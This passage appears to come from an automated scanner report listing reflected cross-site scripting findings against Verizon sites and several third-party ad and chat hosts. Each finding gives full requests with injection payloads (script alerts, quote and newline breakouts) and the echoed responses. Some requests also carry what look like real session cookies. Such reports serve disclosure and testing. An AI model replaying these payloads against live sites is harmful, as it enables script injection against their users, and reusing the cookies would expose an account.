The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a2adb(a)e545f998bfa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /SMBPortalWeb/appmanager/SMBPortal/a2adb(a)e545f998bfa HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 78
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Mon, 05 Sep 2011 22:34:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:34:46 GMT
Connection: close

Resource /SMBPortal/a2adb(a)e545f998bfa could not be resolved for locale null.

2.6. https://collaborateext.verizon.com/aims/encore/VZCTC.serv [Source%20Title parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://collaborateext.verizon.com
Path:	/aims/encore/VZCTC.serv

Issue detail

The value of the Source%20Title request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3384e"%20a%3db%20da4ed1ab32f was submitted in the Source%20Title parameter. This input was echoed as 3384e" a=b da4ed1ab32f in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /aims/encore/VZCTC.serv?appid=141&Source%20Title=Sign%20In3384e"%20a%3db%20da4ed1ab32f&Source%20URL=https%3A//signin.verizon.com/sso/ResetAccount%3FgoFlow%3DresetAccount%23&lob=&initQ=Forgot%20User%20Credentials HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://signin.verizon.com/sso/ResetAccount?goFlow=resetAccount
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:25:24 GMT
Content-length: 2589
Content-type: text/html; charset=ISO-8859-1
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM'
X-Powered-By: Servlet/2.5 JSP/2.1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<title>Your automated customer
...[SNIP]...
<input name="sourceTitle" id="sourceTitle" type="hidden" value="Sign In3384e" a=b da4ed1ab32f"/>
...[SNIP]...

2.7. https://collaborateext.verizon.com/aims/encore/VZCTC.serv [Source%20URL parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://collaborateext.verizon.com
Path:	/aims/encore/VZCTC.serv

Issue detail

The value of the Source%20URL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 634ef"%20a%3db%208d0d9136ddf was submitted in the Source%20URL parameter. This input was echoed as 634ef" a=b 8d0d9136ddf in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /aims/encore/VZCTC.serv?appid=141&Source%20Title=Sign%20In&Source%20URL=https%3A//signin.verizon.com/sso/ResetAccount%3FgoFlow%3DresetAccount%23634ef"%20a%3db%208d0d9136ddf&lob=&initQ=Forgot%20User%20Credentials HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://signin.verizon.com/sso/ResetAccount?goFlow=resetAccount
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:25:49 GMT
Content-length: 2589
Content-type: text/html; charset=ISO-8859-1
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM'
X-Powered-By: Servlet/2.5 JSP/2.1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<title>Your automated customer
...[SNIP]...
<input name="sourceURL" id="sourceURL" type="hidden" value="https://signin.verizon.com/sso/ResetAccount?goFlow=resetAccount#634ef" a=b 8d0d9136ddf"/>
...[SNIP]...

2.8. https://collaborateext.verizon.com/aims/encore/VZCTC.serv [initQ parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://collaborateext.verizon.com
Path:	/aims/encore/VZCTC.serv

Issue detail

The value of the initQ request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea847"%20a%3db%20c02826d64c0 was submitted in the initQ parameter. This input was echoed as ea847" a=b c02826d64c0 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /aims/encore/VZCTC.serv?appid=141&Source%20Title=Sign%20In&Source%20URL=https%3A//signin.verizon.com/sso/ResetAccount%3FgoFlow%3DresetAccount%23&lob=&initQ=Forgot%20User%20Credentialsea847"%20a%3db%20c02826d64c0 HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://signin.verizon.com/sso/ResetAccount?goFlow=resetAccount
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:26:41 GMT
Content-length: 2589
Content-type: text/html; charset=ISO-8859-1
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM'
X-Powered-By: Servlet/2.5 JSP/2.1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<title>Your automated customer
...[SNIP]...
<input name="initQ" id="initQ" type="hidden" value="Forgot User Credentialsea847" a=b c02826d64c0"/>
...[SNIP]...

2.9. https://collaborateext.verizon.com/aims/encore/VZCTC.serv [lob parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://collaborateext.verizon.com
Path:	/aims/encore/VZCTC.serv

Issue detail

The value of the lob request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3158"%20a%3db%20e7c5d162739 was submitted in the lob parameter. This input was echoed as e3158" a=b e7c5d162739 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /aims/encore/VZCTC.serv?appid=141&Source%20Title=Sign%20In&Source%20URL=https%3A//signin.verizon.com/sso/ResetAccount%3FgoFlow%3DresetAccount%23&lob=e3158"%20a%3db%20e7c5d162739&initQ=Forgot%20User%20Credentials HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://signin.verizon.com/sso/ResetAccount?goFlow=resetAccount
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:26:15 GMT
Content-length: 2589
Content-type: text/html; charset=ISO-8859-1
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM'
X-Powered-By: Servlet/2.5 JSP/2.1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<title>Your automated customer
...[SNIP]...
<input name="param_141-7" id="param_141-7" type="hidden" value="e3158" a=b e7c5d162739" >
...[SNIP]...

2.10. http://gigaom.com/cloud/structure-50/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gigaom.com
Path:	/cloud/structure-50/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 22df2'><script>alert(1)</script>66c5427a585 was submitted in the REST URL parameter 2. This input was echoed as 22df2\'><script>alert(1)</script>66c5427a585 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cloud/structure-5022df2'><script>alert(1)</script>66c5427a585/ HTTP/1.1
Host: gigaom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 05 Sep 2011 22:36:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://gigaom.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 05 Sep 2011 22:36:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=60
Pragma: no-cache
Content-Length: 82351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<a href='http://gigaom.com/cloud/structure-5022df2\'><script>alert(1)</script>66c5427a585/page/2/' class='go-page'>
...[SNIP]...

2.11. http://media.verizon.com/media/scripts/widget.ashx [container parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.verizon.com
Path:	/media/scripts/widget.ashx

Issue detail

The value of the container request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24165"%3balert(1)//19985c64c11 was submitted in the container parameter. This input was echoed as 24165";alert(1)//19985c64c11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /media/scripts/widget.ashx?widget=vzMedia&container=vzSliderWidget24165"%3balert(1)//19985c64c11 HTTP/1.1
Host: media.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 79439
Date: Mon, 05 Sep 2011 22:42:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=KQfyhK9qeUc=&H=&I=&J=JxCF029RF/U=; domain=verizon.com; expires=Wed, 07-Sep-2011 22:41:41 GMT; path=/media

/* widget.ashx code generated : 9/5/2011 10:41:41 PM; valid until: 9/5/2011 6:06:44 PM */
var vzWidgetsBaseURI = 'http://media.verizon.com/media',
vzWidgetsSignedIn = true;

/* files consolidated
...[SNIP]...
</script>\
       \
       ";
   jQuery("#vzSliderWidget24165";alert(1)//19985c64c11").html( ctrl );
});

2.12. http://media.verizon.com/media/scripts/widget.ashx [widget parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.verizon.com
Path:	/media/scripts/widget.ashx

Issue detail

The value of the widget request parameter is copied into the HTML document as plain text between tags. The payload 60a70<script>alert(1)</script>abb46e132b5 was submitted in the widget parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/scripts/widget.ashx?widget=vzMedia60a70<script>alert(1)</script>abb46e132b5&container=vzSliderWidget HTTP/1.1
Host: media.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 253
Date: Mon, 05 Sep 2011 22:42:06 GMT
Connection: close
Vary: Accept-Encoding

/* could not complete request : System.Exception: No configuration is available for the requested widget (vzMedia60a70<script>alert(1)</script>abb46e132b5).
at WidgetHandler.get_Arguments()
at WidgetHandler.ProcessRequest(HttpContext context) */

2.13. http://r.turn.com/server/beacon_call.js [b2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/beacon_call.js

Issue detail

The value of the b2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28612"%3balert(1)//32b8a96ebbe was submitted in the b2 parameter. This input was echoed as 28612";alert(1)//32b8a96ebbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /server/beacon_call.js?b2=zWOV_b2-olxW30r-HvgJ-W8JL5NcaiTtCBKWjV3AS6GHDRKM8X_rBRqVIW4_D0WxJkwj0wgBX_MIOECGKTmV8g28612"%3balert(1)//32b8a96ebbe HTTP/1.1
Host: r.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html
Cookie: uid=9033442320916087634; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C1%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C2%7C12%7C1001%7C1004%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15202%7C15202%7C15202%7C15223%7C15202%7C15202%7C15202%7C15194%7C15202%7C15202%7C15202%7C15202%7C15202%7C15202%7C15194%7C15202%7C15194%7C15194%7C15202%7C15202%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15202; rv=1; fc=xFsVg2N5BLRd3913bzR8lbdsz0uhFmslucaZ7Jr3mb45MUavfnaJp-qRT1nS-_kGC4aSOgkXjG13Wq25-lwlCD18zri1103r8NJl4Sm4Yb4O80RBhSgX-D3DVkBBvzpfNjvVPfh6F_xUBn8aeyghtRS-_grHJMquJlAgZxTfBk0TLhIyApmoDuGDhqzDr2b9kZEWsMxS9P5cnP5iZn1K9R8mQIq3knkBTuwivM4IAjc

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Wed, 07 Sep 2011 22:14:40 GMT
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:14:40 GMT
Content-Length: 1572

(function() {
   function reset(w, doc) {
       var n=null;
       w.turn_beacon_data=n;
       w.turn_beacon_price=n;
       w.turn_beacon_url=n;
       w.turn_client_track_id=n;
       w.turn_beacon_referrer_url=n;
       w.turn_beaco
...[SNIP]...
nction setBeaconUrl(w, doc) {
                   w.turn_beacon_url = "http://r.turn.com/r/beacon?";
                           w.turn_beacon_data = "zWOV_b2-olxW30r-HvgJ-W8JL5NcaiTtCBKWjV3AS6GHDRKM8X_rBRqVIW4_D0WxJkwj0wgBX_MIOECGKTmV8g28612";alert(1)//32b8a96ebbe";
           addBeaconUrlParam(w, "b2", w.turn_beacon_data);
               addBeaconUrlParam(w, "jsb", "1");
                   addBeaconUrlParam(w, "bprice", w.turn_beacon_price);
                           addBeaconUrlParam(w, "cid", w.turn_client_tr
...[SNIP]...

2.14. http://s.xp1.ru4.com/meta [ssv_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s.xp1.ru4.com
Path:	/meta

Issue detail

The value of the ssv_callback request parameter is copied into the HTML document as plain text between tags. The payload db97b<script>alert(1)</script>2c290befa45 was submitted in the ssv_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /meta?_o=15772&_t=ghp&ssv_random=27&ssv_callback=SetXP1Placementsdb97b<script>alert(1)</script>2c290befa45&ssv_003=&ssv_004=&ssv_005=&ssv_006=&ssv_007=&ssv_008=&ssv_009=&ssv_010=&ssv_011=&ssv_012=0&ssv_013=0&ssv_014=807&ssv_015=&ssv_016= HTTP/1.1
Host: s.xp1.ru4.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
Cookie: X1ID=BO-00000000521444319; O1807966=768; P1807966=c3N2X2MzfFl8MTMxMjc2OTY3N3xzc3ZfYnxjM3wxMzEyNzY5Njc3fHNzdl8xfDI4NTQ0NTM5OHwxMzEyNzY5Njc3fA==; M62795-97956=1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 05 Sep 2011 22:15:15 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 1621610-B22941263=0|0|0|0|0|22946267|22946266|-1; domain=.ru4.com; path=/
Set-cookie: P15772=; domain=.ru4.com; path=/; expires=Mon, 01-Jan-2010 12:00:00 GMT
Content-type: text/html
Content-length: 1535
X-Cnection: close

SetXP1Placementsdb97b<script>alert(1)</script>2c290befa45({
"xp1_placement1": {
"creativeID": "GHP_OT_HSIDL3M_DEF",
"clickURL": "http://s.xp1.ru4.com/click?_o=15772&_n=62795&_c=1621610&_x=17344902&_b=17344904&_d=17345346&_g=173453
...[SNIP]...

2.15. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload d227a%0acf71731e6ad was submitted in the site parameter. This input was echoed as d227a
cf71731e6ad in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /visitor/addons/deploy.asp?site=2329305d227a%0acf71731e6ad&d_id=undefined HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315261001562

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:17:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2140
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSQCSDTSC=FKAPLFPBAEMCBLJIOBGFJFDD; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 2329305d227a
cf71731e6ad
lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maem
...[SNIP]...

2.16. http://search.verizon.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
